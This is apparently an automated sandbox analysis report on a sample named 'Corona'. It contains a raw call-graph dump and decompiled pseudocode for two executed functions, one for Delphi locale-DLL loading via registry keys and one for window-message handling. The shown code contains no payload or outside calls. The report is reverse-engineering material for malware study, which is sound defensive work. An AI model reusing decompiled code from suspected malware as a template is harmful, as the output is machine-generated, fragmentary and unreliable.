29413 446148 64 API calls 29361->29413 29363 42f98c 126 API calls 29362->29363 29367 446d28 29363->29367 29364 446bce 29364->29361 29411 446148 64 API calls 29364->29411 29366 446d05 29414 4349b8 56 API calls 29366->29414 29367->29316 29409 41c614 29 API calls 29368->29409 29372 446bef 29412 4349b8 56 API calls 29372->29412 29374 446c02 29375 446c31 29374->29375 29376 446c0e MulDiv 29374->29376 29377 446c60 29375->29377 29378 446c3d MulDiv 29375->29378 29376->29375 29377->29361 29379 446c6c MulDiv MulDiv 29377->29379 29378->29377 29379->29361 29381 41692c 56 API calls 29380->29381 29382 4181a1 29381->29382 29383 403f3c 25 API calls 29382->29383 29384 4181af 29383->29384 29429 404364 29384->29429 29387 41692c 56 API calls 29388 417e03 29387->29388 29389 412e58 58 API calls 29388->29389 29389->29307 29390->29311 29393 416937 29391->29393 29392 416971 29392->29324 29395 4163ec 56 API calls 29392->29395 29393->29392 29396 416978 56 API calls 29393->29396 29395->29324 29396->29393 29397->29330 29398->29334 29399->29330 29400->29343 29401->29347 29402->29348 29403->29349 29404->29346 29406 430f66 29405->29406 29415 42dc30 29406->29415 29408 430f7e 29408->29359 29409->29358 29410->29364 29411->29372 29412->29374 29413->29366 29414->29362 29416 42dc4c 29415->29416 29417 4194f8 92 API calls 29416->29417 29418 42dc62 29417->29418 29419 42dcbd 29418->29419 29420 42f98c 126 API calls 29418->29420 29419->29408 29421 42dc7d 29420->29421 29422 42f98c 126 API calls 29421->29422 29423 42dc8d 29422->29423 29424 42f98c 126 API calls 29423->29424 29425 42dc9d 29424->29425 29426 42f98c 126 API calls 29425->29426 29427 42dcad 29426->29427 29428 42f98c 126 API calls 29427->29428 29428->29419 29430 404318 29429->29430 29431 404353 29430->29431 29432 403f10 25 API calls 29430->29432 29431->29387 29433 40432f 29432->29433 29433->29431 29435 4026dc 11 API calls 29433->29435 29435->29431 29436->28969 29445 44da54 PeekMessageA 29437->29445 29440 44db08 29440->28974 29442->28972 29443->28974 29444->28974 29446 44dade 29445->29446 29447 44da70 29445->29447 29446->29440 29457 44e3bc 140 API calls 29446->29457 29447->29446 29458 44d9b4 29447->29458 29456 44dad0 TranslateMessage DispatchMessageA 29456->29446 29457->29440 29459 44d9df 29458->29459 29460 44d9c8 29458->29460 29459->29446 29462 44d8ac 29459->29462 29460->29459 29482 44e914 8 API calls 29460->29482 29463 44d8f6 29462->29463 29464 44d8bc 29462->29464 29463->29446 29466 44d8fc 29463->29466 29464->29463 29465 44d8e3 TranslateMDISysAccel 29464->29465 29465->29463 29467 44d914 29466->29467 29468 44d9ad 29466->29468 29467->29468 29469 44d91f GetCapture 29467->29469 29468->29446 29479 44d888 29468->29479 29470 44d980 GetWindowLongA 29469->29470 29474 44d92a 29469->29474 29470->29468 29471 44d990 SendMessageA 29470->29471 29471->29468 29472 44d97c 29471->29472 29472->29468 29475 44d95b 29474->29475 29477 44d944 GetParent 29474->29477 29478 44d93b 29474->29478 29483 42b6d4 7 API calls 29474->29483 29476 44d961 SendMessageA 29475->29476 29475->29478 29476->29468 29476->29472 29477->29474 29478->29476 29480 44d8a8 29479->29480 29481 44d89b IsDialogMessage 29479->29481 29480->29446 29480->29456 29481->29480 29482->29459 29483->29474 29484 449f58 29485 449f80 29484->29485 29486 449fa8 29484->29486 29485->29486 29540 40597c 56 API calls 29485->29540 29531 44e66c 29486->29531 29490 449f99 29541 40b1b8 25 API calls 29490->29541 29491 44a3ee 29493 44a388 29495 44a3da 29493->29495 29545 449104 64 API calls 29493->29545 29494 449fec 29502 44a053 29494->29502 29506 44a10a 29494->29506 29497 44a3e6 29495->29497 29498 44a3f3 29495->29498 29546 43244c 56 API calls 29497->29546 29500 44a41e 29498->29500 29501 44a3ff 29498->29501 29503 44a428 GetActiveWindow 29500->29503 29507 44a416 SetWindowPos 29501->29507 29530 44a105 29502->29530 29542 4483b4 56 API calls 29502->29542 29508 44a433 29503->29508 29527 44a452 29503->29527 29504 44a363 29511 44a37d ShowWindow 29504->29511 29505 44a2ae 29509 44a2f0 29505->29509 29510 44a2ba 29505->29510 29506->29530 29543 4483b4 56 API calls 29506->29543 29507->29491 29512 44a43b IsIconic 29508->29512 29514 44a30a ShowWindow 29509->29514 29513 44a2c4 SendMessageA 29510->29513 29511->29491 29517 44a445 29512->29517 29512->29527 29518 434ef4 29513->29518 29519 434ef4 29514->29519 29515 44a458 29520 44a46f SetWindowPos SetActiveWindow 29515->29520 29516 44a47d 29521 44a487 ShowWindow 29516->29521 29547 444d68 GetCurrentThreadId 72E7AC10 29517->29547 29522 44a2e8 ShowWindow 29518->29522 29523 44a32e CallWindowProcA 29519->29523 29520->29491 29521->29491 29524 44a341 SendMessageA 29522->29524 29544 42ea44 29523->29544 29524->29491 29527->29515 29527->29516 29530->29504 29530->29505 29532 44e67f 29531->29532 29538 449fb7 29531->29538 29533 44e6e2 29532->29533 29536 44e6d3 29532->29536 29539 44e6c9 IsChild 29532->29539 29548 44b85c 29532->29548 29534 44e610 2 API calls 29533->29534 29534->29538 29551 44e610 IsWindowVisible 29536->29551 29538->29491 29538->29493 29538->29494 29539->29532 29539->29536 29540->29490 29541->29486 29542->29530 29543->29530 29544->29524 29545->29495 29546->29491 29547->29527 29549 4136f8 56 API calls 29548->29549 29550 44b86c 29549->29550 29550->29532 29552 44e667 29551->29552 29553 44e633 29551->29553 29552->29538 29553->29552 29554 44e63b SetWindowPos 29553->29554 29554->29552 29555 449618 29556 449627 29555->29556 29561 448040 29556->29561 29559 449647 29562 4480d4 29561->29562 29572 448064 29561->29572 29564 4480e5 29562->29564 29592 441b78 72 API calls 29562->29592 29565 448125 29564->29565 29568 4481bd 29564->29568 29569 448198 29565->29569 29578 448140 29565->29578 29566 44b85c 56 API calls 29566->29572 29567 4481d7 29570 448196 29567->29570 29571 4481e9 29567->29571 29568->29567 29573 4481d1 SetMenu 29568->29573 29569->29567 29580 4481ac 29569->29580 29570->29567 29594 449104 64 API calls 29570->29594 29595 447f78 62 API calls 29571->29595 29572->29562 29572->29566 29590 40597c 56 API calls 29572->29590 29591 40b1f4 56 API calls 29572->29591 29573->29567 29576 4481f0 29579 403e4c 11 API calls 29576->29579 29578->29567 29584 448163 GetMenu 29578->29584 29581 448205 29579->29581 29583 4481b5 SetMenu 29580->29583 29581->29559 29589 44951c 10 API calls 29581->29589 29583->29567 29585 448186 29584->29585 29586 44816d 29584->29586 29593 441b78 72 API calls 29585->29593 29588 448180 SetMenu 29586->29588 29588->29585 29589->29559 29590->29572 29591->29572 29592->29564 29593->29570 29594->29571 29595->29576 29596 445e88 29597 445ea4 29596->29597 29598 445e93 29596->29598 29599 445ea6 29598->29599 29600 445e9d 29598->29600 29611 4459bc 62 API calls 29599->29611 29605 445e64 29600->29605 29603 445eb3 29612 4459bc 62 API calls 29603->29612 29606 445e86 29605->29606 29607 445e70 29605->29607 29606->29597 29613 445270 29607->29613 29610 445270 62 API calls 29610->29606 29611->29603 29612->29597 29614 445309 29613->29614 29615 44528e 29613->29615 29614->29610 29616 44530b 29615->29616 29621 44529c 29615->29621 29617 4459a4 62 API calls 29616->29617 29617->29614 29618 4452f2 29622 4459a4 29618->29622 29620 431c54 56 API calls 29620->29621 29621->29618 29621->29620 29623 4459ad 29622->29623 29626 445ee4 29623->29626 29625 4459ba 29625->29614 29627 445fd6 29626->29627 29628 445efb 29626->29628 29627->29625 29628->29627 29647 445484 29628->29647 29631 445f35 29633 445af0 62 API calls 29631->29633 29632 445f5b 29634 445484 2 API calls 29632->29634 29635 445f47 29633->29635 29636 445f69 29634->29636 29637 445af0 62 API calls 29635->29637 29638 445f93 29636->29638 29639 445f6d 29636->29639 29642 445f59 29637->29642 29650 445af0 29638->29650 29640 445af0 62 API calls 29639->29640 29643 445f7f 29640->29643 29642->29625 29645 445af0 62 API calls 29643->29645 29645->29642 29646 445af0 62 API calls 29646->29642 29662 445404 29647->29662 29649 445492 29649->29631 29649->29632 29651 445b16 29650->29651 29652 445404 2 API calls 29651->29652 29653 445b2f 29651->29653 29652->29653 29654 445404 2 API calls 29653->29654 29655 445b7d 29654->29655 29672 4459e8 29655->29672 29657 445b97 29676 44586c 59 API calls 29657->29676 29659 445bc8 29660 445404 2 API calls 29659->29660 29661 445bd3 29660->29661 29661->29646 29663 434ef4 29662->29663 29664 445421 GetWindowLongA 29663->29664 29665 44545e 29664->29665 29666 44543e 29664->29666 29671 445388 GetWindowLongA 29665->29671 29670 445388 GetWindowLongA 29666->29670 29669 44544a 29669->29649 29670->29669 29671->29669 29674 445a25 29672->29674 29677 41bf6c 29674->29677 29675 445aca 29675->29657 29676->29659 29678 41bf70 GetSysColor 29677->29678 29679 41bf7b 29677->29679 29678->29679 29679->29675 29680 431eac 29686 431edf 29680->29686 29681 431f58 GetClassInfoA 29682 431f7f 29681->29682 29683 431fbd 29682->29683 29684 431f90 UnregisterClassA 29682->29684 29685 431f9d RegisterClassA 29682->29685 29710 43207c 29683->29710 29684->29685 29685->29683 29688 431fb8 29685->29688 29686->29681 29694 431f0c 29686->29694 29737 40597c 56 API calls 29686->29737 29739 40c5c8 58 API calls 29688->29739 29691 431f41 29738 40b1f4 56 API calls 29691->29738 29692 431fe1 GetWindowLongA 29696 432017 29692->29696 29697 431ff6 GetWindowLongA 29692->29697 29694->29681 29713 4084a8 29696->29713 29697->29696 29698 432008 SetWindowLongA 29697->29698 29698->29696 29702 43202b 29724 41c440 29702->29724 29704 432035 29705 42f98c 126 API calls 29704->29705 29706 432043 29705->29706 29707 403e4c 11 API calls 29706->29707 29708 43206c 29707->29708 29741 40679c 29710->29741 29712 431fd3 29712->29692 29740 40c5c8 58 API calls 29712->29740 29714 4084b6 29713->29714 29715 4084ac 29713->29715 29717 435160 IsIconic 29714->29717 29746 4026dc 11 API calls 29715->29746 29718 435178 GetWindowPlacement 29717->29718 29719 43519d GetWindowRect 29717->29719 29720 4351aa GetWindowLongA 29718->29720 29719->29720 29721 4351e5 29720->29721 29722 4351bf GetWindowLongA 29720->29722 29721->29702 29722->29721 29723 4351d3 ScreenToClient ScreenToClient 29722->29723 29723->29721 29725 41c475 29724->29725 29726 41c5a8 29724->29726 29747 41b784 RtlEnterCriticalSection 29725->29747 29752 403e70 11 API calls 29726->29752 29729 41c589 29751 41b790 RtlLeaveCriticalSection 29729->29751 29730 41c5c8 29730->29704 29731 41c47f 29731->29729 29748 407ad0 29731->29748 29733 41c5a0 29733->29704 29735 41c57a CreateFontIndirectA 29735->29729 29736 41c516 29736->29735 29737->29691 29738->29694 29739->29683 29740->29692 29745 402908 29741->29745 29743 4067af CreateWindowExA 29744 4067e9 29743->29744 29744->29712 29745->29743 29746->29714 29747->29731 29749 407add 29748->29749 29750 407af5 CompareStringA 29749->29750 29750->29736 29751->29733 29752->29730

                                  Executed Functions

                                  Function 004050DC, Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 184registrystringlibraryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  C-Code - Quality: 65%
                                  			E004050DC(intOrPtr __eax) {
				intOrPtr _v8;
				void* _v12;
				char _v15;
				char _v17;
				char _v18;
				char _v22;
				int _v28;
				char _v289;
				long _t44;
				long _t61;
				long _t63;
				CHAR* _t70;
				CHAR* _t72;
				struct HINSTANCE__* _t78;
				struct HINSTANCE__* _t84;
				char* _t94;
				void* _t95;
				intOrPtr _t99;
				struct HINSTANCE__* _t107;
				void* _t110;
				void* _t112;
				intOrPtr _t113;

				_t110 = _t112;
				_t113 = _t112 + 0xfffffee0;
				_v8 = __eax;
				GetModuleFileNameA(0,  &_v289, 0x105);
				_v22 = 0;
				_t44 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
				if(_t44 == 0) {
					L3:
					_push(_t110);
					_push(0x4051e1);
					_push( *[fs:eax]);
					 *[fs:eax] = _t113;
					_v28 = 5;
					E00404F24( &_v289, 0x105);
					if(RegQueryValueExA(_v12,  &_v289, 0, 0,  &_v22,  &_v28) != 0 && RegQueryValueExA(_v12, E00405348, 0, 0,  &_v22,  &_v28) != 0) {
						_v22 = 0;
					}
					_v18 = 0;
					_pop(_t99);
					 *[fs:eax] = _t99;
					_push(E004051E8);
					return RegCloseKey(_v12);
				} else {
					_t61 = RegOpenKeyExA(0x80000002, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
					if(_t61 == 0) {
						goto L3;
					} else {
						_t63 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Delphi\\Locales", 0, 0xf0019,  &_v12); // executed
						if(_t63 != 0) {
							_push(0x105);
							_push(_v8);
							_push( &_v289);
							L00401294();
							GetLocaleInfoA(GetThreadLocale(), 3,  &_v17, 5); // executed
							_t107 = 0;
							if(_v289 != 0 && (_v17 != 0 || _v22 != 0)) {
								_t70 =  &_v289;
								_push(_t70);
								L0040129C();
								_t94 = _t70 +  &_v289;
								while( *_t94 != 0x2e && _t94 !=  &_v289) {
									_t94 = _t94 - 1;
								}
								_t72 =  &_v289;
								if(_t94 != _t72) {
									_t95 = _t94 + 1;
									if(_v22 != 0) {
										_push(0x105 - _t95 - _t72);
										_push( &_v22);
										_push(_t95);
										L00401294();
										_t107 = LoadLibraryExA( &_v289, 0, 2);
									}
									if(_t107 == 0 && _v17 != 0) {
										_push(0x105 - _t95 -  &_v289);
										_push( &_v17);
										_push(_t95);
										L00401294();
										_t78 = LoadLibraryExA( &_v289, 0, 2); // executed
										_t107 = _t78;
										if(_t107 == 0) {
											_v15 = 0;
											_push(0x105 - _t95 -  &_v289);
											_push( &_v17);
											_push(_t95);
											L00401294();
											_t84 = LoadLibraryExA( &_v289, 0, 2); // executed
											_t107 = _t84;
										}
									}
								}
							}
							return _t107;
						} else {
							goto L3;
						}
					}
				}
			}

























                                  0x004050dd
                                  0x004050df
                                  0x004050e7
                                  0x004050f8
                                  0x004050fd
                                  0x00405116
                                  0x0040511d
                                  0x0040515f
                                  0x00405161
                                  0x00405162
                                  0x00405167
                                  0x0040516a
                                  0x0040516d
                                  0x0040517f
                                  0x004051a2
                                  0x004051c2
                                  0x004051c2
                                  0x004051c6
                                  0x004051cc
                                  0x004051cf
                                  0x004051d2
                                  0x004051e0
                                  0x0040511f
                                  0x00405134
                                  0x0040513b
                                  0x00000000
                                  0x0040513d
                                  0x00405152
                                  0x00405159
                                  0x004051e8
                                  0x004051f0
                                  0x004051f7
                                  0x004051f8
                                  0x0040520b
                                  0x00405210
                                  0x00405219
                                  0x0040522f
                                  0x00405235
                                  0x00405236
                                  0x00405243
                                  0x00405248
                                  0x00405247
                                  0x00405247
                                  0x00405257
                                  0x0040525f
                                  0x00405265
                                  0x0040526a
                                  0x00405277
                                  0x0040527b
                                  0x0040527c
                                  0x0040527d
                                  0x00405292
                                  0x00405292
                                  0x00405296
                                  0x004052af
                                  0x004052b3
                                  0x004052b4
                                  0x004052b5
                                  0x004052c5
                                  0x004052ca
                                  0x004052ce
                                  0x004052d0
                                  0x004052e5
                                  0x004052e9
                                  0x004052ea
                                  0x004052eb
                                  0x004052fb
                                  0x00405300
                                  0x00405300
                                  0x004052ce
                                  0x00405296
                                  0x0040525f
                                  0x00405309
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00405159
                                  0x0040513b

                                  APIs
                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000105,00000001,004500A4,?,00404ECC,00400000,?,00000105,00000001,00410414,00404F08,004059AC,0000FF9D,?), ref: 004050F8
                                  • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,004500A4,?,00404ECC,00400000,?,00000105,00000001), ref: 00405116
                                  • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,004500A4), ref: 00405134
                                  • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00405152
                                  • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,004051E1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 0040519B
                                  • RegQueryValueExA.ADVAPI32(?,00405348,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,004051E1,?,80000001), ref: 004051B9
                                  • RegCloseKey.ADVAPI32(?,004051E8,00000000,00000000,00000005,00000000,004051E1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 004051DB
                                  • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 004051F8
                                  • GetThreadLocale.KERNEL32(00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 00405205
                                  • GetLocaleInfoA.KERNEL32(00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 0040520B
                                  • lstrlen.KERNEL32(00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 00405236
                                  • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 0040527D
                                  • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 0040528D
                                  • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 004052B5
                                  • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 004052C5
                                  • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?), ref: 004052EB
                                  • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001), ref: 004052FB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                  • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                  • API String ID: 1759228003-2375825460
                                  • Opcode ID: ed610e587486814b6a3bc8edb0e0a96db485b90eae97accbd1bad58008c15f50
                                  • Instruction ID: f0b3551943a262964bae4e9a5e92ceb772aae5630afecc57578a19bc146b0e81
                                  • Opcode Fuzzy Hash: ed610e587486814b6a3bc8edb0e0a96db485b90eae97accbd1bad58008c15f50
                                  • Instruction Fuzzy Hash: F3515375A4075C7AEB21D6A49C86FEF77ACDB04744F4001BABA04F61C2D6BC9A448F64
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0044CF30, Relevance: 26.7, APIs: 13, Strings: 2, Instructions: 401COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 25 44cf30-44cf64 26 44cf66-44cf67 25->26 27 44cf98-44cfad call 44cde4 25->27 28 44cf69-44cf85 call 4136f8 26->28 33 44d061-44d066 27->33 34 44cfb3 27->34 53 44cf94-44cf96 28->53 54 44cf87-44cf8f 28->54 37 44d0b7-44d0bc 33->37 38 44d068 33->38 35 44d4ff-44d514 call 44e050 34->35 36 44cfb9-44cfbc 34->36 61 44d5e0-44d5e8 35->61 39 44cfbe 36->39 40 44d028-44d02b 36->40 42 44d0dd-44d0e2 37->42 43 44d0be 37->43 45 44d3d7-44d3df 38->45 46 44d06e-44d073 38->46 49 44d2c4-44d2cb 39->49 50 44cfc4-44cfc7 39->50 51 44d02d 40->51 52 44d04a-44d04d 40->52 58 44d552-44d559 42->58 59 44d0e8-44d0ee 42->59 55 44d0c4-44d0c9 43->55 56 44d519-44d520 43->56 60 44d3e5-44d3f0 call 434ef4 45->60 45->61 47 44d075 46->47 48 44d09e-44d0a3 46->48 71 44d470-44d47b 47->71 72 44d07b-44d080 47->72 74 44d498-44d4a3 48->74 75 44d0a9-44d0ac 48->75 49->61 78 44d2d1-44d2db 49->78 62 44cfcd 50->62 63 44d5d9-44d5da call 44cea8 50->63 64 44d5a3-44d5b4 call 44c3e8 call 44cea8 51->64 65 44d033-44d036 51->65 66 44d053-44d056 52->66 67 44d18f-44d19d call 44d634 52->67 53->27 53->28 73 44d5ff-44d605 54->73 79 44d4c0-44d4ce IsIconic 55->79 80 44d0cf-44d0d2 55->80 68 44d522-44d535 call 44db10 56->68 69 44d53a-44d54d call 44db6c 56->69 76 44d56c-44d57b 58->76 77 44d55b-44d56a 58->77 81 44d394-44d3b0 call 44ef7c 59->81 82 44d0f4 59->82 60->61 113 44d3f6-44d405 call 434ef4 IsWindowEnabled 60->113 61->73 62->40 111 44d5df 63->111 64->61 86 44d03c-44d03f 65->86 87 44d57d-44d5a1 call 4396d0 call 44ce3c call 44cea8 65->87 89 44d2e0-44d2ec 66->89 90 44d05c 66->90 67->61 68->61 69->61 71->61 101 44d481-44d493 71->101 95 44d082-44d088 72->95 96 44d0f9-44d109 72->96 74->61 84 44d4a9-44d4bb 74->84 98 44d3b5-44d3c2 call 44d9e8 75->98 99 44d0b2 75->99 76->61 77->61 78->61 79->61 85 44d4d4-44d4df GetFocus 79->85 80->35 100 44d0d8 80->100 81->61 82->63 84->61 85->61 105 44d4e5-44d4ee call 444d68 85->105 106 44d045 86->106 107 44d1c3-44d1e4 call 44cea8 86->107 87->61 89->61 118 44d2f2-44d2fc 89->118 90->63 114 44d08e-44d093 95->114 115 44d298-44d2bf SendMessageA 95->115 103 44d114-44d11c call 44d650 96->103 104 44d10b-44d110 96->104 98->61 139 44d3c8-44d3d2 98->139 99->63 100->63 101->61 103->61 121 44d121-44d129 call 44d700 104->121 122 44d112-44d135 call 44cea8 104->122 105->61 148 44d4f4-44d4fa SetFocus 105->148 106->63 149 44d1e6-44d203 call 44cd48 PostMessageA 107->149 150 44d208-44d225 call 44cd38 PostMessageA 107->150 111->61 113->61 151 44d40b-44d41a call 434ef4 IsWindowVisible 113->151 129 44d5b6-44d5c2 call 427fec call 4280cc 114->129 130 44d099 114->130 115->61 118->61 132 44d302-44d30c 118->132 121->61 122->61 129->61 169 44d5c4-44d5ce call 427fec call 428128 129->169 130->63 143 44d387-44d38f 132->143 144 44d30e-44d32a call 40cbf0 132->144 139->61 143->61 161 44d36c-44d382 GetLastError 144->161 162 44d32c-44d34e GetProcAddress 144->162 148->61 149->61 150->61 151->61 170 44d420-44d46b GetFocus call 434ef4 SetFocus call 42f98c SetFocus 151->170 161->61 162->61 168 44d354-44d367 162->168 168->61 169->61 170->61
                                  C-Code - Quality: 94%
                                  			E0044CF30(struct HWND__* __eax, void* __ecx, struct HWND__* __edx) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed int _t161;
				struct HWND__* _t162;
				struct HWND__* _t163;
				void* _t166;
				struct HWND__* _t176;
				struct HWND__* _t185;
				struct HWND__* _t188;
				struct HWND__* _t189;
				struct HWND__* _t191;
				struct HWND__* _t197;
				struct HWND__* _t199;
				struct HWND__* _t202;
				struct HWND__* _t205;
				struct HWND__* _t206;
				struct HWND__* _t216;
				struct HWND__* _t217;
				struct HWND__* _t222;
				struct HWND__* _t224;
				struct HWND__* _t227;
				struct HWND__* _t231;
				struct HWND__* _t239;
				struct HWND__* _t247;
				struct HWND__* _t250;
				struct HWND__* _t254;
				struct HWND__* _t256;
				struct HWND__* _t257;
				struct HWND__* _t269;
				intOrPtr _t272;
				struct HWND__* _t275;
				intOrPtr* _t276;
				struct HWND__* _t284;
				struct HWND__* _t286;
				struct HWND__* _t297;
				void* _t306;
				signed int _t308;
				struct HWND__* _t314;
				struct HWND__* _t315;
				struct HWND__* _t316;
				void* _t317;
				intOrPtr _t340;
				struct HWND__* _t344;
				intOrPtr _t366;
				void* _t370;
				struct HWND__* _t375;
				void* _t376;
				void* _t377;
				intOrPtr _t378;

				_t317 = __ecx;
				_push(_t370);
				_v12 = __edx;
				_v8 = __eax;
				_push(_t377);
				_push(0x44d5ea);
				_push( *[fs:edx]);
				 *[fs:edx] = _t378;
				 *(_v12 + 0xc) = 0;
				_t306 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0xa8)) + 8)) - 1;
				if(_t306 < 0) {
					L5:
					E0044CDE4(_v8, _t317, _v12);
					_t308 =  *_v12;
					_t161 = _t308;
					__eflags = _t161 - 0x53;
					if(__eflags > 0) {
						__eflags = _t161 - 0xb017;
						if(__eflags > 0) {
							__eflags = _t161 - 0xb020;
							if(__eflags > 0) {
								_t162 = _t161 - 0xb031;
								__eflags = _t162;
								if(_t162 == 0) {
									_t163 = _v12;
									__eflags =  *((intOrPtr*)(_t163 + 4)) - 1;
									if( *((intOrPtr*)(_t163 + 4)) != 1) {
										 *(_v8 + 0xb0) =  *(_v12 + 8);
									} else {
										 *(_v12 + 0xc) =  *(_v8 + 0xb0);
									}
									L102:
									_t166 = 0;
									_pop(_t340);
									 *[fs:eax] = _t340;
									goto L103;
								}
								__eflags = _t162 + 0xfffffff2 - 2;
								if(_t162 + 0xfffffff2 - 2 < 0) {
									 *(_v12 + 0xc) = E0044EF7C(_v8,  *(_v12 + 8), _t308) & 0x0000007f;
								} else {
									L101:
									E0044CEA8(_t377); // executed
								}
								goto L102;
							}
							if(__eflags == 0) {
								_t176 = _v12;
								__eflags =  *(_t176 + 4);
								if( *(_t176 + 4) != 0) {
									E0044DB6C(_v8, _t317,  *( *(_v12 + 8)),  *((intOrPtr*)( *(_v12 + 8) + 4)));
								} else {
									E0044DB10(_v8,  *( *(_v12 + 8)),  *((intOrPtr*)( *(_v12 + 8) + 4)));
								}
								goto L102;
							}
							_t185 = _t161 - 0xb01a;
							__eflags = _t185;
							if(_t185 == 0) {
								_t188 = IsIconic( *(_v8 + 0x30));
								__eflags = _t188;
								if(_t188 == 0) {
									_t189 = GetFocus();
									_t344 = _v8;
									__eflags = _t189 -  *((intOrPtr*)(_t344 + 0x30));
									if(_t189 ==  *((intOrPtr*)(_t344 + 0x30))) {
										_t191 = E00444D68(0);
										__eflags = _t191;
										if(_t191 != 0) {
											SetFocus(_t191);
										}
									}
								}
								goto L102;
							}
							__eflags = _t185 == 5;
							if(_t185 == 5) {
								L89:
								E0044E050(_v8,  *(_v12 + 8),  *(_v12 + 4));
								goto L102;
							} else {
								goto L101;
							}
						}
						if(__eflags == 0) {
							_t197 =  *(_v8 + 0x44);
							__eflags = _t197;
							if(_t197 != 0) {
								_t372 = _t197;
								_t199 = E00434EF4(_t197);
								__eflags = _t199;
								if(_t199 != 0) {
									_t202 = IsWindowEnabled(E00434EF4(_t372));
									__eflags = _t202;
									if(_t202 != 0) {
										_t205 = IsWindowVisible(E00434EF4(_t372));
										__eflags = _t205;
										if(_t205 != 0) {
											 *0x450c20 = 0;
											_t206 = GetFocus();
											SetFocus(E00434EF4(_t372));
											E0042F98C(_t372,  *(_v12 + 4), 0x112,  *(_v12 + 8));
											SetFocus(_t206);
											 *0x450c20 = 1;
											 *(_v12 + 0xc) = 1;
										}
									}
								}
							}
							goto L102;
						}
						__eflags = _t161 - 0xb000;
						if(__eflags > 0) {
							_t216 = _t161 - 0xb001;
							__eflags = _t216;
							if(_t216 == 0) {
								_t217 = _v8;
								__eflags =  *((short*)(_t217 + 0x10a));
								if( *((short*)(_t217 + 0x10a)) != 0) {
									 *((intOrPtr*)(_v8 + 0x108))();
								}
								goto L102;
							}
							__eflags = _t216 == 0x15;
							if(_t216 == 0x15) {
								_t222 = E0044D9E8(_v8, _t317, _v12);
								__eflags = _t222;
								if(_t222 != 0) {
									 *(_v12 + 0xc) = 1;
								}
								goto L102;
							} else {
								goto L101;
							}
						}
						if(__eflags == 0) {
							_t224 = _v8;
							__eflags =  *((short*)(_t224 + 0x112));
							if( *((short*)(_t224 + 0x112)) != 0) {
								 *((intOrPtr*)(_v8 + 0x110))();
							}
							goto L102;
						}
						_t227 = _t161 - 0x112;
						__eflags = _t227;
						if(_t227 == 0) {
							_t231 = ( *(_v12 + 4) & 0x0000fff0) - 0xf020;
							__eflags = _t231;
							if(_t231 == 0) {
								E0044D650(_v8);
							} else {
								__eflags = _t231 == 0x100;
								if(_t231 == 0x100) {
									E0044D700(_v8);
								} else {
									E0044CEA8(_t377);
								}
							}
							goto L102;
						}
